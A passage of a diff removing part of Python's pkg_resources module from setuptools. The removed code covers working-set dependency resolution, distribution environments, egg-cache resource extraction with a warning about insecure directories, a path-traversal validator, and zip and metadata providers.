``.entries`` of the ``sys.path`` WorkingSet should always - equal ``sys.path``.) - """ - self.entry_keys.setdefault(entry, []) - self.entries.append(entry) - for dist in find_distributions(entry, True): - self.add(dist, entry, False) - - def __contains__(self, dist): - """True if `dist` is the active distribution for its project""" - return self.by_key.get(dist.key) == dist - - def find(self, req): - """Find a distribution matching requirement `req` - - If there is an active distribution for the requested project, this - returns it as long as it meets the version requirement specified by - `req`. 
But, if there is an active distribution for the project and it - does *not* meet the `req` requirement, ``VersionConflict`` is raised. - If there is no active distribution for the requested project, ``None`` - is returned. - """ - dist = self.by_key.get(req.key) - if dist is not None and dist not in req: - # XXX add more info - raise VersionConflict(dist, req) - return dist - - def iter_entry_points(self, group, name=None): - """Yield entry point objects from `group` matching `name` - - If `name` is None, yields all entry points in `group` from all - distributions in the working set, otherwise only ones matching - both `group` and `name` are yielded (in distribution order). - """ - return ( - entry - for dist in self - for entry in dist.get_entry_map(group).values() - if name is None or name == entry.name - ) - - def run_script(self, requires, script_name): - """Locate distribution for `requires` and run `script_name` script""" - ns = sys._getframe(1).f_globals - name = ns['__name__'] - ns.clear() - ns['__name__'] = name - self.require(requires)[0].run_script(script_name, ns) - - def __iter__(self): - """Yield distributions for non-duplicate projects in the working set - - The yield order is the order in which the items' path entries were - added to the working set. - """ - seen = {} - for item in self.entries: - if item not in self.entry_keys: - # workaround a cache issue - continue - - for key in self.entry_keys[item]: - if key not in seen: - seen[key] = 1 - yield self.by_key[key] - - def add(self, dist, entry=None, insert=True, replace=False): - """Add `dist` to working set, associated with `entry` - - If `entry` is unspecified, it defaults to the ``.location`` of `dist`. - On exit from this routine, `entry` is added to the end of the working - set's ``.entries`` (if it wasn't already present). - - `dist` is only added to the working set if it's for a project that - doesn't already have a distribution in the set, unless `replace=True`. - If it's added, any callbacks registered with the ``subscribe()`` method - will be called. - """ - if insert: - dist.insert_on(self.entries, entry, replace=replace) - - if entry is None: - entry = dist.location - keys = self.entry_keys.setdefault(entry, []) - keys2 = self.entry_keys.setdefault(dist.location, []) - if not replace and dist.key in self.by_key: - # ignore hidden distros - return - - self.by_key[dist.key] = dist - if dist.key not in keys: - keys.append(dist.key) - if dist.key not in keys2: - keys2.append(dist.key) - self._added_new(dist) - - def resolve(self, requirements, env=None, installer=None, - replace_conflicting=False, extras=None): - """List all distributions needed to (recursively) meet `requirements` - - `requirements` must be a sequence of ``Requirement`` objects. `env`, - if supplied, should be an ``Environment`` instance. If - not supplied, it defaults to all distributions available within any - entry or distribution in the working set. `installer`, if supplied, - will be invoked with each requirement that cannot be met by an - already-installed distribution; it should return a ``Distribution`` or - ``None``. - - Unless `replace_conflicting=True`, raises a VersionConflict exception - if - any requirements are found on the path that have the correct name but - the wrong version. Otherwise, if an `installer` is supplied it will be - invoked to obtain the correct version of the requirement and activate - it. - - `extras` is a list of the extras to be used with these requirements. 
- This is important because extra requirements may look like `my_req; - extra = "my_extra"`, which would otherwise be interpreted as a purely - optional requirement. Instead, we want to be able to assert that these - requirements are truly required. - """ - - # set up the stack - requirements = list(requirements)[::-1] - # set of processed requirements - processed = {} - # key -> dist - best = {} - to_activate = [] - - req_extras = _ReqExtras() - - # Mapping of requirement to set of distributions that required it; - # useful for reporting info about conflicts. - required_by = collections.defaultdict(set) - - while requirements: - # process dependencies breadth-first - req = requirements.pop(0) - if req in processed: - # Ignore cyclic or redundant dependencies - continue - - if not req_extras.markers_pass(req, extras): - continue - - dist = best.get(req.key) - if dist is None: - # Find the best distribution and add it to the map - dist = self.by_key.get(req.key) - if dist is None or (dist not in req and replace_conflicting): - ws = self - if env is None: - if dist is None: - env = Environment(self.entries) - else: - # Use an empty environment and workingset to avoid - # any further conflicts with the conflicting - # distribution - env = Environment([]) - ws = WorkingSet([]) - dist = best[req.key] = env.best_match( - req, ws, installer, - replace_conflicting=replace_conflicting - ) - if dist is None: - requirers = required_by.get(req, None) - raise DistributionNotFound(req, requirers) - to_activate.append(dist) - if dist not in req: - # Oops, the "best" so far conflicts with a dependency - dependent_req = required_by[req] - raise VersionConflict(dist, req).with_context(dependent_req) - - # push the new requirements onto the stack - new_requirements = dist.requires(req.extras)[::-1] - requirements.extend(new_requirements) - - # Register the new requirements needed by req - for new_requirement in new_requirements: - required_by[new_requirement].add(req.project_name) - req_extras[new_requirement] = req.extras - - processed[req] = True - - # return list of distros to activate - return to_activate - - def find_plugins( - self, plugin_env, full_env=None, installer=None, fallback=True): - """Find all activatable distributions in `plugin_env` - - Example usage:: - - distributions, errors = working_set.find_plugins( - Environment(plugin_dirlist) - ) - # add plugins+libs to sys.path - map(working_set.add, distributions) - # display errors - print('Could not load', errors) - - The `plugin_env` should be an ``Environment`` instance that contains - only distributions that are in the project's "plugin directory" or - directories. The `full_env`, if supplied, should be an ``Environment`` - contains all currently-available distributions. If `full_env` is not - supplied, one is created automatically from the ``WorkingSet`` this - method is called on, which will typically mean that every directory on - ``sys.path`` will be scanned for distributions. - - `installer` is a standard installer callback as used by the - ``resolve()`` method. The `fallback` flag indicates whether we should - attempt to resolve older versions of a plugin if the newest version - cannot be resolved. - - This method returns a 2-tuple: (`distributions`, `error_info`), where - `distributions` is a list of the distributions found in `plugin_env` - that were loadable, along with any other distributions that are needed - to resolve their dependencies. 
`error_info` is a dictionary mapping - unloadable plugin distributions to an exception instance describing the - error that occurred. Usually this will be a ``DistributionNotFound`` or - ``VersionConflict`` instance. - """ - - plugin_projects = list(plugin_env) - # scan project names in alphabetic order - plugin_projects.sort() - - error_info = {} - distributions = {} - - if full_env is None: - env = Environment(self.entries) - env += plugin_env - else: - env = full_env + plugin_env - - shadow_set = self.__class__([]) - # put all our entries in shadow_set - list(map(shadow_set.add, self)) - - for project_name in plugin_projects: - - for dist in plugin_env[project_name]: - - req = [dist.as_requirement()] - - try: - resolvees = shadow_set.resolve(req, env, installer) - - except ResolutionError as v: - # save error info - error_info[dist] = v - if fallback: - # try the next older version of project - continue - else: - # give up on this project, keep going - break - - else: - list(map(shadow_set.add, resolvees)) - distributions.update(dict.fromkeys(resolvees)) - - # success, no need to try any more versions of this project - break - - distributions = list(distributions) - distributions.sort() - - return distributions, error_info - - def require(self, *requirements): - """Ensure that distributions matching `requirements` are activated - - `requirements` must be a string or a (possibly-nested) sequence - thereof, specifying the distributions and versions required. The - return value is a sequence of the distributions that needed to be - activated to fulfill the requirements; all relevant distributions are - included, even if they were already activated in this working set. - """ - needed = self.resolve(parse_requirements(requirements)) - - for dist in needed: - self.add(dist) - - return needed - - def subscribe(self, callback, existing=True): - """Invoke `callback` for all distributions - - If `existing=True` (default), - call on all existing ones, as well. - """ - if callback in self.callbacks: - return - self.callbacks.append(callback) - if not existing: - return - for dist in self: - callback(dist) - - def _added_new(self, dist): - for callback in self.callbacks: - callback(dist) - - def __getstate__(self): - return ( - self.entries[:], self.entry_keys.copy(), self.by_key.copy(), - self.callbacks[:] - ) - - def __setstate__(self, e_k_b_c): - entries, keys, by_key, callbacks = e_k_b_c - self.entries = entries[:] - self.entry_keys = keys.copy() - self.by_key = by_key.copy() - self.callbacks = callbacks[:] - - -class _ReqExtras(dict): - """ - Map each requirement to the extras that demanded it. - """ - - def markers_pass(self, req, extras=None): - """ - Evaluate markers for req against each extra that - demanded it. - - Return False if the req has a marker and fails - evaluation. Otherwise, return True. - """ - extra_evals = ( - req.marker.evaluate({'extra': extra}) - for extra in self.get(req, ()) + (extras or (None,)) - ) - return not req.marker or any(extra_evals) - - -class Environment: - """Searchable snapshot of distributions on a search path""" - - def __init__( - self, search_path=None, platform=get_supported_platform(), - python=PY_MAJOR): - """Snapshot distributions available on a search path - - Any distributions found on `search_path` are added to the environment. - `search_path` should be a sequence of ``sys.path`` items. If not - supplied, ``sys.path`` is used. 
- - `platform` is an optional string specifying the name of the platform - that platform-specific distributions must be compatible with. If - unspecified, it defaults to the current platform. `python` is an - optional string naming the desired version of Python (e.g. ``'3.6'``); - it defaults to the current version. - - You may explicitly set `platform` (and/or `python`) to ``None`` if you - wish to map *all* distributions, not just those compatible with the - running platform or Python version. - """ - self._distmap = {} - self.platform = platform - self.python = python - self.scan(search_path) - - def can_add(self, dist): - """Is distribution `dist` acceptable for this environment? - - The distribution must match the platform and python version - requirements specified when this environment was created, or False - is returned. - """ - py_compat = ( - self.python is None - or dist.py_version is None - or dist.py_version == self.python - ) - return py_compat and compatible_platforms(dist.platform, self.platform) - - def remove(self, dist): - """Remove `dist` from the environment""" - self._distmap[dist.key].remove(dist) - - def scan(self, search_path=None): - """Scan `search_path` for distributions usable in this environment - - Any distributions found are added to the environment. - `search_path` should be a sequence of ``sys.path`` items. If not - supplied, ``sys.path`` is used. Only distributions conforming to - the platform/python version defined at initialization are added. - """ - if search_path is None: - search_path = sys.path - - for item in search_path: - for dist in find_distributions(item): - self.add(dist) - - def __getitem__(self, project_name): - """Return a newest-to-oldest list of distributions for `project_name` - - Uses case-insensitive `project_name` comparison, assuming all the - project's distributions use their project's name converted to all - lowercase as their key. - - """ - distribution_key = project_name.lower() - return self._distmap.get(distribution_key, []) - - def add(self, dist): - """Add `dist` if we ``can_add()`` it and it has not already been added - """ - if self.can_add(dist) and dist.has_version(): - dists = self._distmap.setdefault(dist.key, []) - if dist not in dists: - dists.append(dist) - dists.sort(key=operator.attrgetter('hashcmp'), reverse=True) - - def best_match( - self, req, working_set, installer=None, replace_conflicting=False): - """Find distribution best matching `req` and usable on `working_set` - - This calls the ``find(req)`` method of the `working_set` to see if a - suitable distribution is already active. (This may raise - ``VersionConflict`` if an unsuitable version of the project is already - active in the specified `working_set`.) If a suitable distribution - isn't active, this method returns the newest distribution in the - environment that meets the ``Requirement`` in `req`. If no suitable - distribution is found, and `installer` is supplied, then the result of - calling the environment's ``obtain(req, installer)`` method will be - returned. - """ - try: - dist = working_set.find(req) - except VersionConflict: - if not replace_conflicting: - raise - dist = None - if dist is not None: - return dist - for dist in self[req.key]: - if dist in req: - return dist - # try to download/install - return self.obtain(req, installer) - - def obtain(self, requirement, installer=None): - """Obtain a distribution matching `requirement` (e.g. via download) - - Obtain a distro that matches requirement (e.g. via download). 
In the - base ``Environment`` class, this routine just returns - ``installer(requirement)``, unless `installer` is None, in which case - None is returned instead. This method is a hook that allows subclasses - to attempt other ways of obtaining a distribution before falling back - to the `installer` argument.""" - if installer is not None: - return installer(requirement) - - def __iter__(self): - """Yield the unique project names of the available distributions""" - for key in self._distmap.keys(): - if self[key]: - yield key - - def __iadd__(self, other): - """In-place addition of a distribution or environment""" - if isinstance(other, Distribution): - self.add(other) - elif isinstance(other, Environment): - for project in other: - for dist in other[project]: - self.add(dist) - else: - raise TypeError("Can't add %r to environment" % (other,)) - return self - - def __add__(self, other): - """Add an environment or distribution to an environment""" - new = self.__class__([], platform=None, python=None) - for env in self, other: - new += env - return new - - -# XXX backward compatibility -AvailableDistributions = Environment - - -class ExtractionError(RuntimeError): - """An error occurred extracting a resource - - The following attributes are available from instances of this exception: - - manager - The resource manager that raised this exception - - cache_path - The base directory for resource extraction - - original_error - The exception instance that caused extraction to fail - """ - - -class ResourceManager: - """Manage resource extraction and packages""" - extraction_path = None - - def __init__(self): - self.cached_files = {} - - def resource_exists(self, package_or_requirement, resource_name): - """Does the named resource exist?""" - return get_provider(package_or_requirement).has_resource(resource_name) - - def resource_isdir(self, package_or_requirement, resource_name): - """Is the named resource an existing directory?""" - return get_provider(package_or_requirement).resource_isdir( - resource_name - ) - - def resource_filename(self, package_or_requirement, resource_name): - """Return a true filesystem path for specified resource""" - return get_provider(package_or_requirement).get_resource_filename( - self, resource_name - ) - - def resource_stream(self, package_or_requirement, resource_name): - """Return a readable file-like object for specified resource""" - return get_provider(package_or_requirement).get_resource_stream( - self, resource_name - ) - - def resource_string(self, package_or_requirement, resource_name): - """Return specified resource as a string""" - return get_provider(package_or_requirement).get_resource_string( - self, resource_name - ) - - def resource_listdir(self, package_or_requirement, resource_name): - """List the contents of the named resource directory""" - return get_provider(package_or_requirement).resource_listdir( - resource_name - ) - - def extraction_error(self): - """Give an error message for problems extracting file(s)""" - - old_exc = sys.exc_info()[1] - cache_path = self.extraction_path or get_default_cache() - - tmpl = textwrap.dedent(""" - Can't extract file(s) to egg cache - - The following error occurred while trying to extract file(s) - to the Python egg cache: - - {old_exc} - - The Python egg cache directory is currently set to: - - {cache_path} - - Perhaps your account does not have write access to this directory? - You can change the cache directory by setting the PYTHON_EGG_CACHE - environment variable to point to an accessible directory. 
- """).lstrip() - err = ExtractionError(tmpl.format(**locals())) - err.manager = self - err.cache_path = cache_path - err.original_error = old_exc - raise err - - def get_cache_path(self, archive_name, names=()): - """Return absolute location in cache for `archive_name` and `names` - - The parent directory of the resulting path will be created if it does - not already exist. `archive_name` should be the base filename of the - enclosing egg (which may not be the name of the enclosing zipfile!), - including its ".egg" extension. `names`, if provided, should be a - sequence of path name parts "under" the egg's extraction location. - - This method should only be called by resource providers that need to - obtain an extraction location, and only for names they intend to - extract, as it tracks the generated names for possible cleanup later. - """ - extract_path = self.extraction_path or get_default_cache() - target_path = os.path.join(extract_path, archive_name + '-tmp', *names) - try: - _bypass_ensure_directory(target_path) - except Exception: - self.extraction_error() - - self._warn_unsafe_extraction_path(extract_path) - - self.cached_files[target_path] = 1 - return target_path - - @staticmethod - def _warn_unsafe_extraction_path(path): - """ - If the default extraction path is overridden and set to an insecure - location, such as /tmp, it opens up an opportunity for an attacker to - replace an extracted file with an unauthorized payload. Warn the user - if a known insecure location is used. - - See Distribute #375 for more details. - """ - if os.name == 'nt' and not path.startswith(os.environ['windir']): - # On Windows, permissions are generally restrictive by default - # and temp directories are not writable by other users, so - # bypass the warning. - return - mode = os.stat(path).st_mode - if mode & stat.S_IWOTH or mode & stat.S_IWGRP: - msg = ( - "%s is writable by group/others and vulnerable to attack " - "when " - "used with get_resource_filename. Consider a more secure " - "location (set with .set_extraction_path or the " - "PYTHON_EGG_CACHE environment variable)." % path - ) - warnings.warn(msg, UserWarning) - - def postprocess(self, tempname, filename): - """Perform any platform-specific postprocessing of `tempname` - - This is where Mac header rewrites should be done; other platforms don't - have anything special they should do. - - Resource providers should call this method ONLY after successfully - extracting a compressed resource. They must NOT call it on resources - that are already in the filesystem. - - `tempname` is the current (temporary) name of the file, and `filename` - is the name it will be renamed to by the caller after this routine - returns. - """ - - if os.name == 'posix': - # Make the resource executable - mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777 - os.chmod(tempname, mode) - - def set_extraction_path(self, path): - """Set the base path where resources will be extracted to, if needed. - - If you do not call this routine before any extractions take place, the - path defaults to the return value of ``get_default_cache()``. (Which - is based on the ``PYTHON_EGG_CACHE`` environment variable, with various - platform-specific fallbacks. See that routine's documentation for more - details.) - - Resources are extracted to subdirectories of this path based upon - information given by the ``IResourceProvider``. You may set this to a - temporary directory, but then you must call ``cleanup_resources()`` to - delete the extracted files when done. 
There is no guarantee that - ``cleanup_resources()`` will be able to remove all extracted files. - - (Note: you may not change the extraction path for a given resource - manager once resources have been extracted, unless you first call - ``cleanup_resources()``.) - """ - if self.cached_files: - raise ValueError( - "Can't change extraction path, files already extracted" - ) - - self.extraction_path = path - - def cleanup_resources(self, force=False): - """ - Delete all extracted resource files and directories, returning a list - of the file and directory names that could not be successfully removed. - This function does not have any concurrency protection, so it should - generally only be called when the extraction path is a temporary - directory exclusive to a single process. This method is not - automatically called; you must call it explicitly or register it as an - ``atexit`` function if you wish to ensure cleanup of a temporary - directory used for extractions. - """ - # XXX - - -def get_default_cache(): - """ - Return the ``PYTHON_EGG_CACHE`` environment variable - or a platform-relevant user cache dir for an app - named "Python-Eggs". - """ - return ( - os.environ.get('PYTHON_EGG_CACHE') - or platformdirs.user_cache_dir(appname='Python-Eggs') - ) - - -def safe_name(name): - """Convert an arbitrary string to a standard distribution name - - Any runs of non-alphanumeric/. characters are replaced with a single '-'. - """ - return re.sub('[^A-Za-z0-9.]+', '-', name) - - -def safe_version(version): - """ - Convert an arbitrary string to a standard version string - """ - try: - # normalize the version - return str(packaging.version.Version(version)) - except packaging.version.InvalidVersion: - version = version.replace(' ', '.') - return re.sub('[^A-Za-z0-9.]+', '-', version) - - -def safe_extra(extra): - """Convert an arbitrary string to a standard 'extra' name - - Any runs of non-alphanumeric characters are replaced with a single '_', - and the result is always lowercased. - """ - return re.sub('[^A-Za-z0-9.-]+', '_', extra).lower() - - -def to_filename(name): - """Convert a project or version name to its filename-escaped form - - Any '-' characters are currently replaced with '_'. - """ - return name.replace('-', '_') - - -def invalid_marker(text): - """ - Validate text as a PEP 508 environment marker; return an exception - if invalid or False otherwise. - """ - try: - evaluate_marker(text) - except SyntaxError as e: - e.filename = None - e.lineno = None - return e - return False - - -def evaluate_marker(text, extra=None): - """ - Evaluate a PEP 508 environment marker. - Return a boolean indicating the marker result in this environment. - Raise SyntaxError if marker is invalid. - - This implementation uses the 'pyparsing' module. 
- """ - try: - marker = packaging.markers.Marker(text) - return marker.evaluate() - except packaging.markers.InvalidMarker as e: - raise SyntaxError(e) - - -class NullProvider: - """Try to implement resources and metadata for arbitrary PEP 302 loaders""" - - egg_name = None - egg_info = None - loader = None - - def __init__(self, module): - self.loader = getattr(module, '__loader__', None) - self.module_path = os.path.dirname(getattr(module, '__file__', '')) - - def get_resource_filename(self, manager, resource_name): - return self._fn(self.module_path, resource_name) - - def get_resource_stream(self, manager, resource_name): - return io.BytesIO(self.get_resource_string(manager, resource_name)) - - def get_resource_string(self, manager, resource_name): - return self._get(self._fn(self.module_path, resource_name)) - - def has_resource(self, resource_name): - return self._has(self._fn(self.module_path, resource_name)) - - def _get_metadata_path(self, name): - return self._fn(self.egg_info, name) - - def has_metadata(self, name): - if not self.egg_info: - return self.egg_info - - path = self._get_metadata_path(name) - return self._has(path) - - def get_metadata(self, name): - if not self.egg_info: - return "" - path = self._get_metadata_path(name) - value = self._get(path) - if six.PY2: - return value - try: - return value.decode('utf-8') - except UnicodeDecodeError as exc: - # Include the path in the error message to simplify - # troubleshooting, and without changing the exception type. - exc.reason += ' in {} file at path: {}'.format(name, path) - raise - - def get_metadata_lines(self, name): - return yield_lines(self.get_metadata(name)) - - def resource_isdir(self, resource_name): - return self._isdir(self._fn(self.module_path, resource_name)) - - def metadata_isdir(self, name): - return self.egg_info and self._isdir(self._fn(self.egg_info, name)) - - def resource_listdir(self, resource_name): - return self._listdir(self._fn(self.module_path, resource_name)) - - def metadata_listdir(self, name): - if self.egg_info: - return self._listdir(self._fn(self.egg_info, name)) - return [] - - def run_script(self, script_name, namespace): - script = 'scripts/' + script_name - if not self.has_metadata(script): - raise ResolutionError( - "Script {script!r} not found in metadata at {self.egg_info!r}" - .format(**locals()), - ) - script_text = self.get_metadata(script).replace('\r\n', '\n') - script_text = script_text.replace('\r', '\n') - script_filename = self._fn(self.egg_info, script) - namespace['__file__'] = script_filename - if os.path.exists(script_filename): - source = open(script_filename).read() - code = compile(source, script_filename, 'exec') - exec(code, namespace, namespace) - else: - from linecache import cache - cache[script_filename] = ( - len(script_text), 0, script_text.split('\n'), script_filename - ) - script_code = compile(script_text, script_filename, 'exec') - exec(script_code, namespace, namespace) - - def _has(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _isdir(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _listdir(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _fn(self, base, resource_name): - self._validate_resource_path(resource_name) - if resource_name: - return os.path.join(base, *resource_name.split('/')) - return base - - @staticmethod - def 
_validate_resource_path(path): - """ - Validate the resource paths according to the docs. - https://setuptools.readthedocs.io/en/latest/pkg_resources.html#basic-resource-access - - >>> warned = getfixture('recwarn') - >>> warnings.simplefilter('always') - >>> vrp = NullProvider._validate_resource_path - >>> vrp('foo/bar.txt') - >>> bool(warned) - False - >>> vrp('../foo/bar.txt') - >>> bool(warned) - True - >>> warned.clear() - >>> vrp('/foo/bar.txt') - >>> bool(warned) - True - >>> vrp('foo/../../bar.txt') - >>> bool(warned) - True - >>> warned.clear() - >>> vrp('foo/f../bar.txt') - >>> bool(warned) - False - - Windows path separators are straight-up disallowed. - >>> vrp(r'\\foo/bar.txt') - Traceback (most recent call last): - ... - ValueError: Use of .. or absolute path in a resource path \ -is not allowed. - - >>> vrp(r'C:\\foo/bar.txt') - Traceback (most recent call last): - ... - ValueError: Use of .. or absolute path in a resource path \ -is not allowed. - - Blank values are allowed - - >>> vrp('') - >>> bool(warned) - False - - Non-string values are not. - - >>> vrp(None) - Traceback (most recent call last): - ... - AttributeError: ... - """ - invalid = ( - os.path.pardir in path.split(posixpath.sep) or - posixpath.isabs(path) or - ntpath.isabs(path) - ) - if not invalid: - return - - msg = "Use of .. or absolute path in a resource path is not allowed." - - # Aggressively disallow Windows absolute paths - if ntpath.isabs(path) and not posixpath.isabs(path): - raise ValueError(msg) - - # for compatibility, warn; in future - # raise ValueError(msg) - warnings.warn( - msg[:-1] + " and will raise exceptions in a future release.", - DeprecationWarning, - stacklevel=4, - ) - - def _get(self, path): - if hasattr(self.loader, 'get_data'): - return self.loader.get_data(path) - raise NotImplementedError( - "Can't perform this operation for loaders without 'get_data()'" - ) - - -register_loader_type(object, NullProvider) - - -class EggProvider(NullProvider): - """Provider based on a virtual filesystem""" - - def __init__(self, module): - NullProvider.__init__(self, module) - self._setup_prefix() - - def _setup_prefix(self): - # we assume here that our metadata may be nested inside a "basket" - # of multiple eggs; that's why we use module_path instead of .archive - path = self.module_path - old = None - while path != old: - if _is_egg_path(path): - self.egg_name = os.path.basename(path) - self.egg_info = os.path.join(path, 'EGG-INFO') - self.egg_root = path - break - old = path - path, base = os.path.split(path) - - -class DefaultProvider(EggProvider): - """Provides access to package resources in the filesystem""" - - def _has(self, path): - return os.path.exists(path) - - def _isdir(self, path): - return os.path.isdir(path) - - def _listdir(self, path): - return os.listdir(path) - - def get_resource_stream(self, manager, resource_name): - return open(self._fn(self.module_path, resource_name), 'rb') - - def _get(self, path): - with open(path, 'rb') as stream: - return stream.read() - - @classmethod - def _register(cls): - loader_names = 'SourceFileLoader', 'SourcelessFileLoader', - for name in loader_names: - loader_cls = getattr(importlib_machinery, name, type(None)) - register_loader_type(loader_cls, cls) - - -DefaultProvider._register() - - -class EmptyProvider(NullProvider): - """Provider that returns nothing for all requests""" - - module_path = None - - _isdir = _has = lambda self, path: False - - def _get(self, path): - return '' - - def _listdir(self, path): - return [] - - def 
__init__(self): - pass - - -empty_provider = EmptyProvider() - - -class ZipManifests(dict): - """ - zip manifest builder - """ - - @classmethod - def build(cls, path): - """ - Build a dictionary similar to the zipimport directory - caches, except instead of tuples, store ZipInfo objects. - - Use a platform-specific path separator (os.sep) for the path keys - for compatibility with pypy on Windows. - """ - with zipfile.ZipFile(path) as zfile: - items = ( - ( - name.replace('/', os.sep), - zfile.getinfo(name), - ) - for name in zfile.namelist() - ) - return dict(items) - - load = build - - -class MemoizedZipManifests(ZipManifests): - """ - Memoized zipfile manifests. - """ - manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime') - - def load(self, path): - """ - Load a manifest at path or return a suitable manifest already loaded. - """ - path = os.path.normpath(path) - mtime = os.stat(path).st_mtime - - if path not in self or self[path].mtime != mtime: - manifest = self.build(path) - self[path] = self.manifest_mod(manifest, mtime) - - return self[path].manifest - - -class ZipProvider(EggProvider): - """Resource support for zips and eggs""" - - eagers = None - _zip_manifests = MemoizedZipManifests() - - def __init__(self, module): - EggProvider.__init__(self, module) - self.zip_pre = self.loader.archive + os.sep - - def _zipinfo_name(self, fspath): - # Convert a virtual filename (full path to file) into a zipfile subpath - # usable with the zipimport directory cache for our target archive - fspath = fspath.rstrip(os.sep) - if fspath == self.loader.archive: - return '' - if fspath.startswith(self.zip_pre): - return fspath[len(self.zip_pre):] - raise AssertionError( - "%s is not a subpath of %s" % (fspath, self.zip_pre) - ) - - def _parts(self, zip_path): - # Convert a zipfile subpath into an egg-relative path part list. 
- # pseudo-fs path - fspath = self.zip_pre + zip_path - if fspath.startswith(self.egg_root + os.sep): - return fspath[len(self.egg_root) + 1:].split(os.sep) - raise AssertionError( - "%s is not a subpath of %s" % (fspath, self.egg_root) - ) - - @property - def zipinfo(self): - return self._zip_manifests.load(self.loader.archive) - - def get_resource_filename(self, manager, resource_name): - if not self.egg_name: - raise NotImplementedError( - "resource_filename() only supported for .egg, not .zip" - ) - # no need to lock for extraction, since we use temp names - zip_path = self._resource_to_zip(resource_name) - eagers = self._get_eager_resources() - if '/'.join(self._parts(zip_path)) in eagers: - for name in eagers: - self._extract_resource(manager, self._eager_to_zip(name)) - return self._extract_resource(manager, zip_path) - - @staticmethod - def _get_date_and_size(zip_stat): - size = zip_stat.file_size - # ymdhms+wday, yday, dst - date_time = zip_stat.date_time + (0, 0, -1) - # 1980 offset already done - timestamp = time.mktime(date_time) - return timestamp, size - - def _extract_resource(self, manager, zip_path): - - if zip_path in self._index(): - for name in self._index()[zip_path]: - last = self._extract_resource( - manager, os.path.join(zip_path, name) - ) - # return the extracted directory name - return os.path.dirname(last) - - timestamp, size = self._get_date_and_size(self.zipinfo[zip_path]) - - if not WRITE_SUPPORT: - raise IOError('"os.rename" and "os.unlink" are not supported ' - 'on this platform') - try: - - real_path = manager.get_cache_path( - self.egg_name, self._parts(zip_path) - ) - - if self._is_current(real_path, zip_path): - return real_path - - outf, tmpnam = _mkstemp( - ".$extract", - dir=os.path.dirname(real_path), - ) - os.write(outf, self.loader.get_data(zip_path)) - os.close(outf) - utime(tmpnam, (timestamp, timestamp)) - manager.postprocess(tmpnam, real_path) - - try: - rename(tmpnam, real_path) - - except os.error: - if os.path.isfile(real_path): - if self._is_current(real_path, zip_path): - # the file became current since it was checked above, - # so proceed. 
- return real_path - # Windows, del old file and retry - elif os.name == 'nt': - unlink(real_path) - rename(tmpnam, real_path) - return real_path - raise - - except os.error: - # report a user-friendly error - manager.extraction_error() - - return real_path - - def _is_current(self, file_path, zip_path): - """ - Return True if the file_path is current for this zip_path - """ - timestamp, size = self._get_date_and_size(self.zipinfo[zip_path]) - if not os.path.isfile(file_path): - return False - stat = os.stat(file_path) - if stat.st_size != size or stat.st_mtime != timestamp: - return False - # check that the contents match - zip_contents = self.loader.get_data(zip_path) - with open(file_path, 'rb') as f: - file_contents = f.read() - return zip_contents == file_contents - - def _get_eager_resources(self): - if self.eagers is None: - eagers = [] - for name in ('native_libs.txt', 'eager_resources.txt'): - if self.has_metadata(name): - eagers.extend(self.get_metadata_lines(name)) - self.eagers = eagers - return self.eagers - - def _index(self): - try: - return self._dirindex - except AttributeError: - ind = {} - for path in self.zipinfo: - parts = path.split(os.sep) - while parts: - parent = os.sep.join(parts[:-1]) - if parent in ind: - ind[parent].append(parts[-1]) - break - else: - ind[parent] = [parts.pop()] - self._dirindex = ind - return ind - - def _has(self, fspath): - zip_path = self._zipinfo_name(fspath) - return zip_path in self.zipinfo or zip_path in self._index() - - def _isdir(self, fspath): - return self._zipinfo_name(fspath) in self._index() - - def _listdir(self, fspath): - return list(self._index().get(self._zipinfo_name(fspath), ())) - - def _eager_to_zip(self, resource_name): - return self._zipinfo_name(self._fn(self.egg_root, resource_name)) - - def _resource_to_zip(self, resource_name): - return self._zipinfo_name(self._fn(self.module_path, resource_name)) - - -register_loader_type(zipimport.zipimporter, ZipProvider) - - -class FileMetadata(EmptyProvider): - """Metadata handler for standalone PKG-INFO files - - Usage:: - - metadata = FileMetadata("/path/to/PKG-INFO") - - This provider rejects all data and metadata requests except for PKG-INFO, - which is treated as existing, and will be the contents of the file at - the provided location. 
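
    Illustrative sketch of how such a provider is typically attached to a
    distribution (the path shown is hypothetical)::

        metadata = FileMetadata("/path/to/PKG-INFO")
        dist = Distribution.from_location(
            "/path/to", "PKG-INFO", metadata, precedence=DEVELOP_DIST)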
- """ - - def __init__(self, path): - self.path = path - - def _get_metadata_path(self, name): - return self.path - - def has_metadata(self, name): - return name == 'PKG-INFO' and os.path.isfile(self.path) - - def get_metadata(self, name): - if name != 'PKG-INFO': - raise KeyError("No metadata except PKG-INFO is available") - - with io.open(self.path, encoding='utf-8', errors="replace") as f: - metadata = f.read() - self._warn_on_replacement(metadata) - return metadata - - def _warn_on_replacement(self, metadata): - # Python 2.7 compat for: replacement_char = '�' - replacement_char = b'\xef\xbf\xbd'.decode('utf-8') - if replacement_char in metadata: - tmpl = "{self.path} could not be properly decoded in UTF-8" - msg = tmpl.format(**locals()) - warnings.warn(msg) - - def get_metadata_lines(self, name): - return yield_lines(self.get_metadata(name)) - - -class PathMetadata(DefaultProvider): - """Metadata provider for egg directories - - Usage:: - - # Development eggs: - - egg_info = "/path/to/PackageName.egg-info" - base_dir = os.path.dirname(egg_info) - metadata = PathMetadata(base_dir, egg_info) - dist_name = os.path.splitext(os.path.basename(egg_info))[0] - dist = Distribution(basedir, project_name=dist_name, metadata=metadata) - - # Unpacked egg directories: - - egg_path = "/path/to/PackageName-ver-pyver-etc.egg" - metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO')) - dist = Distribution.from_filename(egg_path, metadata=metadata) - """ - - def __init__(self, path, egg_info): - self.module_path = path - self.egg_info = egg_info - - -class EggMetadata(ZipProvider): - """Metadata provider for .egg files""" - - def __init__(self, importer): - """Create a metadata provider from a zipimporter""" - - self.zip_pre = importer.archive + os.sep - self.loader = importer - if importer.prefix: - self.module_path = os.path.join(importer.archive, importer.prefix) - else: - self.module_path = importer.archive - self._setup_prefix() - - -_declare_state('dict', _distribution_finders={}) - - -def register_finder(importer_type, distribution_finder): - """Register `distribution_finder` to find distributions in sys.path items - - `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item - handler), and `distribution_finder` is a callable that, passed a path - item and the importer instance, yields ``Distribution`` instances found on - that path item. See ``pkg_resources.find_on_path`` for 